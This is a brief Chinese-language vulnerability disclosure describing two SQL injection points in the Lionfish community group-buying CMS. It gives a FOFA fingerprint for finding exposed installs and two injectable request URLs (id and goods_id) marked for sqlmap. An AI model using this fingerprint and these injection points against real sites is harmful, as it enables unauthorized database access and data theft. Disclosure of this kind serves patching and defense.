狮子鱼社区团购系统CMS存在两处SQL注入-棉花糖会员站

# 狮子鱼社区团购系统CMS存在两处SQL注入

## 漏洞描述

狮子鱼社区团购系统CMS存在SQL注入

## 漏洞影响

> 狮子鱼社区团购系统

## FOFA

> “/seller.php?s=/Public/login”

## 代码审计

###SQL注入（1）

“`
http://localhost/index.php?s=api/goods/get_goods_detail&id=1* id为注入参数
“`

![1](/static/qingy/狮子鱼社区团购系统CMS存在两处SQL注入/img/1.png)

![2](/static/qingy/狮子鱼社区团购系统CMS存在两处SQL注入/img/2.png)

###SQL注入（2）

“`
http://localhost/index.php?s=api/goods_detail&goods_id=1* id为注入参数
“`

![3](/static/qingy/狮子鱼社区团购系统CMS存在两处SQL注入/img/3.png)

![4](/static/qingy/狮子鱼社区团购系统CMS存在两处SQL注入/img/4.png)

直接sqlmap梭哈：

![5](/static/qingy/狮子鱼社区团购系统CMS存在两处SQL注入/img/5.png)

文章版权归作者所有，未经允许请勿转载。

THE END

狮子鱼社区团购系统CMS存在两处SQL注入